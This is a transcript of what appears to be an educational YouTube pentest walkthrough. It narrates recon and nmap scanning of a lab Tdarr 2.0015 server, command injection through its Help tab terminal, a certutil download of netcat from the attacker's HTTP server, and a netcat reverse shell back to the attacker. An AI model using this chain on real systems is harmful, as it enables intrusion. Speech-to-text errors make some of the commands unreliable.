Hey guys, welcome back to BT InfoSec. My name is BT and I will be taking you through another video today. So today's video, I'm going to be touching base on penetration testing. And today I want to talk about the penetration testing phases. The penetration testing has 6 phases, and the first phase is the planning. So this covers things like the rules of engagement, talking with the clients, the scope of work, and all the targets that needs to be covered for the testing. The second phase is the reconnaissance and information gathering. So in this phase, you want to do a little bit of open source intelligence, or you want to see if you're able to reach the host, which host is alive. Maybe you want to ping the host. If it's an external penetration test, you want to try to see what host, if you're able to get to the host. If it's internal penetration test, you want to see how you can get to other hosts within the network. So going to enumeration and scanning, if you're working on an external penetration test, this is where you do your Nmap scan, or you do your Nessus scan, or Nexpose scan. You basically your vulnerability scan. You want to see what vulnerabilities are in are there within the network, and you also want to run things like other tools like Tdarr. Maybe if you get a particular HTTP web application and you want to try to see some other directories, you use tools like Tdarr, GoBuster, and from other tools just for your scanning. Then now you've been able to find some vulnerabilities in the network, you go to the next stage, which is the attack and gaining access and exploitation. So you find a vulnerability, you want to exploit that vulnerability. So that's the next phase. You want to try to see how to take advantage of that vulnerability. Then the next phase is persistence. Most of the time for penetration testing, you don't really need persistence because you're a tester, so you just want to take a little bit of, you want to find a way into the network and see how you can take screenshots for your client, just to see so your client knows exactly what's going on. We also go to the next phase, which is analytics and reporting. So this covers things like you putting all the findings together and putting all the reporting together for your client. So I'm going to go over to my Kali machine now. I have a machine here that I'm going to work on today, and the name of the machine is Tdarr. So I'm just going to give a shout out to the creator of this machine. The creator of this machine is IT Security Labs. He created this machine for one of his live stream for an OSCP like machine for a domain controller. So he's always having the live stream every Sunday. If you want to join his live stream, it's 9 p.m. Central Standard Time. You can join his live stream every Sunday. And he created this machine I'm going to be using for this testing today. So this is my Kali machine, and everybody has a Kali Linux. You could just download this online. And basically, the first thing you want to do in your phase is, if we're talking about the planning phase, so we've gone over the planning phase right now because in this engagement, basically, you can always check out how a rules of engagement looks like. But for this particular engagement, we're going to start with the reconnaissance and information gathering. So let's go back here. So the first thing you want to do for your reconnaissance and information gathering is you want to try to see how you can run net discovery. You want to see to make sure the IP addresses or the hosts you were provided by the client are reachable. So I already ran this ahead of time. So I ran net discover, but let me just show you the command. The command is just net discover, and you put -i for interface, and you can always put what interface. So if I put ifconfig, for example, so this is showing all my interfaces. So I can just say net discover -i, and I'm gonna put the interface so my Tdarr is on host only. So the host only I have here, the host only network adapter is for the ETH1. So I'm just gonna put the ETH1. So you just click on this and it just starts scanning all the interface for you. So I already ran this ahead. So our IP address is 192.168.208.132. So that's the IP address for this virtual machine running our web application. So I'm just going to stop this right now and clear the screen. Going to make this a little bit bigger. Okay, so the next thing you want to do is now you've gone you want to try to find out if you're able to ping your host. So this is the IP address of the host. We see our host is alive. So now at this point in time, the first phase, which is the reconnaissance, we want to try to see an information gathering. Okay, so the information gathering phase. Now we know we can get our to our host. The next thing we want to do is we want to try to see. We want to try to go to we want to try to go to Google, and we want to type TDARR. So now we don't know what exactly this is all about, but our clients told us that the name of the host or the name of the machine is TDAR, and we want to know more about TDAR. So the first thing you need to do is you just go online, and if you right now it says TDR version 2 distributed transcoding system. So you want to know more about this. You want to get a little bit of information about this. That's another phase. That's part of the reconnaissance and information gathering. You want to know what exactly this is all about and what this does. This is a tool, and it says the TDR is a conditional based transcoding application for automating media library transcode slash remux management. So that is just on this stage of you trying to get more information and the reconnaissance. Now, the next thing is let's go back to our host here. So the next thing right now we want to do right now is we want to try to run an nmap scan. Okay, so run nmap minus sc minus sv, and we'll go 192.168.208.132. So we run an nmap scan against our host and try to see what ports are opened. I'm going to stop this right now. If you want to run an nmap scan, the best thing to do is make sure you want to scan all ports. So you put -p. So this is part of the reconnaissance enumeration and scanning phase. So right now we're going to run an nmap scan, and now we want to scan all ports, just so that way we make sure that we don't miss any port while we're scanning. So while our nmap scan is running, okay, so now we want to make sure that our nmap scan, when we're running the scan, we scan all ports. The first time I tried running it without scanning all ports, so you have to make sure you scan all ports so you can get all the ports that are available. So next phase, now you want to go through each of these port and services that are opened. So you're looking at the ports here. This is port 53, which is a DNS port. Check port 88, which is Kerberos. This is a domain controller already. We get to see it's a Windows Server 2016. So in this phase, you go through each of the phases, each of the ports and services that's running on this particular system, because you want to make sure that you can go through every port and services to find any vulnerable port, any vulnerable services running, or to see if there's any port running a default password. So without further ado, I'm just going to go straight down to the vulnerable application running here. So this vulnerable application here says the name of the application here is TDARR. It's running on port 8265 and 8266, and that's why it's always good for you to run your nmap scanning all ports, because if we ran just the regular nmap scan without telling nmap to scan all ports, nmap is going to scan the default first 1000 ports, and that way we won't get to this 8266 where this web application is running. So the next thing you want to do is you want to go over to the web browser in your Kali machine. So the next thing you want to do is you want to put the IP address of your host 192.168.208. I think IP address is 208.132. So you want to make sure you put in the port. So what's the port we found there? So the port that we found that running this is 8266 and 8265. So you put a colon 8266. Okay, it's running on HTTP, not HTTPS. And once we run that, it's gonna bring our vulnerable application. So right now, this is the vulnerable application, and the next thing is going back to our reconnaissance stage. The next thing is the enumeration and the scanning phase. We want to try to see go a little bit step back to the reconnaissance and information gathering phase, and where we were talking about this. Now we want to try to see the releases. So the releases here says there was a 2.0015 which was released on the 4th of March 2022, and this 2.00.16 was released 16th March 2022. So going back to our VM, right now our vulnerable application right here says it is running a 2.0015 right there. So the next thing you want to do in the information gathering of your penetration testing is you go back to your best friend Google and you type Tdarr, and the next thing you put is exploit. You want to see if there's any vulnerability affecting this web application. So right now we can see one here says exploit DB, which is the first one on the list. So we click on that and we want to see what exactly is going on. So it says exploit title is this Tdarr 2.0015 jackpot. So now we see that there's a particular exploit for that particular web application running on that host. So this was released on the 10th of March 2022, and if we go over here we find out this was released on the 4th of March 2022, which this particular version, when this was released few days later, a vulnerable application, a vulnerable version, a vulnerable exploit came out that somebody found out that he was able to exploit a vulnerability. So next thing you want to do is, now part of the information gathering and the reconnaissance phase, you want to make sure you want to understand what exactly is going on in this. You want to understand what exactly is going on in this exploit. So the help tab contains. So this exploit is explaining from exploit DB, from the author of this exploit. It says the help tab contains a terminal for both FFmpeg and handbrake. So these terminals do not include input filtering. So that's a particular vulnerability where a lot of web applications, some of web applications have today, that there's no input validation or input filtering. So it allows the user to chain commands and spawn a reverse shell. So this particular exploit was tested on a Linux host. That's why you can see the etc password. But like I said, a shout out to IT Security Lab. He installed this on a Windows operating system, and he was able to exploit the same vulnerability on a Windows server. So now that we see that as a vulnerable, that the help tab is vulnerable, now going back to your VM. So now now coming back here, let me go over to. Coming back here, we have been able to go over the planning phase. We've passed the reconnaissance and information gathering. So we bounce back between these two phases. There's the enumeration and scanning. Then we went a little bit backward to the reconnaissance and see what exactly more information we can get about our host and if there's any exploits in the wild. Now that we see that the version running on our application, which is 2.0015, and we also see that the exploit in the wild is 2.0015, then we know that definitely our client has a web application in their environment that is vulnerable to this particular attack. Now, the next thing you want to go is, after we've been able to find this, we want to move over to the attack stroke gaining access and exploitation. So if we go back to our VM right now, and next thing we want to do is we want to look for the help tab. So this is the help tab right here, and what does the help tab do? All you need to do is you click run. So you want to understand what exactly the help tab is doing. So it says the help tab hyperfast audio and video encoder. gives you a little bit of what it's just like when you type maybe you type nmap or a command dash help in Linux. It gives you some help commands and some things you need to understand. So this is exactly the vulnerable part of this web application. So going back to our proof of concept, our proof of concept says if you just add this, maybe for example like this with who am I, it's gonna work. So let's see. But this is definitely this was tested on a Linux host. So if we run this right now, it doesn't give us anything. Okay, so like that kind of situation, as an attacker or as a penetration tester, you want to ask yourself, what exactly are you going to do? What are you going to try to see if like this didn't work, but it worked on Linux. So the next thing you want to do is you want to try to play with it. So maybe you want to start putting different commands in there. For example, you put this. Just try to see how you can put some Boolean functions, for example, and I just put different things, and try to play with it, try to see if it's gonna work. Because you're a penetration tester, you already saw it worked, so you have to try to see what exactly you can do to make it work. And boom, when we put the and command, watch one and. Now let's scroll all over to the bottom of this page, and we can see right here it says win domain / vagrant. That's who am I when we just put a command who am I. So now what we've been able to do right now is we've been able to send an application, we've been able to send a command, an arbitrary command to the backend server, and the server is responding to us, not checking the type of command being sent, because this particular web application has a vulnerability where this help tab does not validate the input that is being sent. So whatever you request is what you're given. So now let's put, since we know it's a Windows host, because we already saw it from our nmap scan, which is Windows 2016 server. So let's type the command ipconfig. So if we click run, if we scroll all the way down, we can see it right on the bottom, and look at it right there. So it says IP before address 192.168.56.102 and the subnet, So at the end of the day, when we run going back to our nmap scan here, can you see that was our host right there? And when we ran our net discover also, we were able to discover this host because we were able to reach that host. Okay, so that already tells us that that particular application is vulnerable based on what we found. So now going back to this, just 1 second. Going back here right now, so we want to make sure the attacks are gaining access. Now we've tried to see how to attack, and we found out that that particular host is vulnerable. Now we want to gain access, and we want to try to exploit this vulnerability we found right now. So I'm going to go back to my VM. So while you're doing this, you're going to be taking screenshots. You have to make sure you take screenshots for your client, because if for every penetration testing, the last phase is your reporting. So you want to make sure all these things that you're doing, you're taking screenshots. Like you take a screenshot of this IP address right here. You also want to take a screenshot of this particular terminal that you found that is vulnerable. So you want to make sure you take all those screenshots for your client. So the next thing you want to do right now is, now that we see that our application is vulnerable, let's try to see how we can gain a reverse shell, which in terms of a vulnerability, we look at a remote code execution, basically an attacker trying to gain access remotely into a particular vulnerable web application. So moving on to the next step now, let's try to see if this host is able to respond. Let's try to ping our Kali host. So we want to ping our own machine because this machine is not connected to the internet, otherwise we would have tried to ping Google DNS. But right now we want to try to ping our Kali box. So let's just say ifconfig. So this is our Kali machine that is going to be on the same subnet. So let's just copy that and let's go back here and we paste that and we run. So if we scroll all the way down here, we can see that the pinging was successful. So this host was able to ping our own Kali machine. So that means if we send something to it, automatically it is responding to us. So the next thing now, we want to try to see how we can gain a reverse shell. Now, in gaining a reverse shell, there are multiple ways you can use to gain a reverse shell, but I'm just going to try the easiest way here. I'm going to try to come up with a video of several steps I've learned of how to gain a reverse shell. You can always send netcat into, you can always use netcat by sending netcat into the host. You can as well use nishang. Nishang is a particular type of way of getting reverse shell, which I learned that while studying. Also, you can also use maybe MSF Venom, but in this video right now, we're going to be using just netcat. So the next thing we want to do right now is we want to try to go over to our, let's go over to our terminal. And we want to try to, let's try to locate netcat. I'm going to clear the screen. So I'm going to locate netcat.exe. So now I find netcat right there. So I'm just going to cd into my documents. I'm going to make Tdarr. I'm going to call that tdarr. cd into tdarr. So the next thing I want to do is I want to copy this, my netcat binary. I want to copy it over here to my, just a copy of it. I want to send it, bring it right here to this folder. So I'm just going to copy that file path and I put a dot. So if I put ls right now, I have my netcat.exe right there. So the next thing I want to do is I want to run a Python HTTP server. So I want to just do python -m http.server and I do port 80 and it says no modo HTTP. Okay, so let me try to see if I can try Python 3. Let me try Python 3. Okay, so right now I'm running my HTTP server, which basically the HTTP server, what this means is if I visit my machine, if I visit my, so let me get the IP address of my Kali first. So ifconfig. So what I just did basically is I hosted a HTTP server on my Kali machine. So the next thing I want to do right now is this. Now this is running. I want to try to use search util. So we want to go over to our box right here. So just to make you guys not to get lost, we're still in this same phase of the attack stroke gaining access to an exploitation phase. That's where we are right now. So the next thing we want to do right now is we want to use this command search util. So we're going to say search util.exe, then -f-split URL cache HTTP, then 192.168, which is going to be our Kali IP. Let me just double check my Kali IP. That's why I ran my Kali IP right here. So I'm just going to copy this just to make my life easy. I'm going to move back here. Just going to paste that right now. So then you're gonna put the file path of where in your Windows machine you want to put this particular binary. So we want to put this in our temp folder. So just because everything that goes in there is temporary, if the Windows machine restarts, basically it's gonna go away. But we want to make sure we can gain a remote code execution into this. So I just have to confirm our command certutil.exe-f-split URL cache HTTP, put our Kali IP address, and I forgot something. I forgot to add my netcat.exe because that's what I want to get, right? So after that, so next thing you do is you run. So when you click run, let's go all the way down to the bottom, and it says right there, our URL cache command completed successfully. So the next thing you want to do is, now that we see that we've been able to send netcat in here, we want to see if our netcat is right in there. So let's try to run the command Tdarr, which is directory for Windows. We're trying to list all the files in the Windows temp directory. So we want to remove the ncat.exe. So that's, we want to check for what the directory. So run this command right now, and it's going to list all the directories. So this is right here, directory / Windows temp. These are all the files in that directory. So let's look for our netcat.exe that we sent. So this is our netcat right here. So our netcat.exe is right there, and we just sent it a few minutes ago. Okay. So now that we see our netcat is in there, right? So the next thing you want to do is you want to gain access into the system. And also, if you want to double check to see if your command was also successful, is you go back to your HTTP server, which is right here. So you can see there was a get command from our browser, which shows that the code was 200, meaning it was successfully taken. So we successfully took ncat.exe from this particular file server that we are running for HTTP server. So the next thing you want to do is, now we've confirmed this is there, it's now time for the exploitation to make sure we gain access into our machine. So the next thing we want to do right now is we want to make sure that we can listen for us to get a reverse shell. So we go over here. So let's go sudo su, put our password, make this bigger. We want to make put ncat-lvmp minus lvmp, and the port number we want to listen on is port 4444, right? So let's listen on port 444, and right now we have a listener running here. Okay, you know what? I'm just gonna clear this screen. Sorry, oops. I'm gonna clear. I'm gonna run my netcat again. So now we have netcat listening. So let's move over down here. So the next thing you want to use is you want to use the command. You want to use this command. So I want to say, we want to use this command. I want to say drive C. So I want to go to the drive C space / Windows. I'm going to go to /temp directory /netcat.exe. So I'm just checking this from my notes, just so for some of you that might feel like, okay, where am I getting this from? I just have some of my notes I put together for commands, and you want to put the IP address of your Kali. So basically, you're trying to see how you can get a reverse shell down to your Kali IP. So I think it's 192.168.208. Now I have to check my Kali IP address because I always forget that all the time. So let me double check, make this bigger. type if config. So this is my IP for this. So that 208.131. Good. That's 131. Okay. So we want to just make sure everything is pretty good. You want to check your command. Yep, I think this is pretty good. So the next thing we want to do is make sure, okay, we are listening right now. So right there. So I'm just going to see how I can make this a little bit smaller so we can see how we're going to gain our reverse shell. So now I want to click on the run. I missed something in my command, so I missed the port 444. So I'm going to run that again. So we run this and boom, we got a reverse shell right there. So if we say, who am I? Right now it says we're Windows Vagrant. And we say if config. No, this is IP config. Pardon me, because this is a Windows host. So I'm gonna make this a little bit bigger. So you can see right now this is our IP address. And we can see pwd. No, that's not going to work on Windows. So let's just cd -. And put Tdarr. So right now we can see, we can go in here and see everything that all the files in here. So basically in a penetration testing, once you get to this phase, we already gain exploitation, which that is the gaining access. We have gained access and we've gone to exploitation phase. So the persistent phase, like I said initially, we're not going to be game persistent because we want to make sure we're able to just let our client know what vulnerability there is on their network that they can remediate. And the next thing is the analytics and the reporting, which is the last stage. And in this stage is where you're going to take screenshots. You're going to try to see how you can let the client know that you were able to gain access to their network. You can create a file saying make Tdarr. It could be BT infosec pentesting, for example. Pentesting. So we're just making a directory and we put dir. We have it right there. Let's see. So we have BT infosec pen testing. You want to take a screenshot of this for your client just to let your client know that, okay, I was able to gain access. I was able to create a malicious payload or just a file calling it this name of my company and putting pen testing there. You want to come up with a detailed report and you want to give them some remediation. So that's the end of this video today. I went through all the phases of the penetration testing. So I'm going to be releasing more videos. Please like this video, please subscribe, and I'm also going to be releasing videos for more on penetration testing and also detection of some of the penetration tests that we do on a client network. And thank you very much for joining me today and have a lovely day. Bye.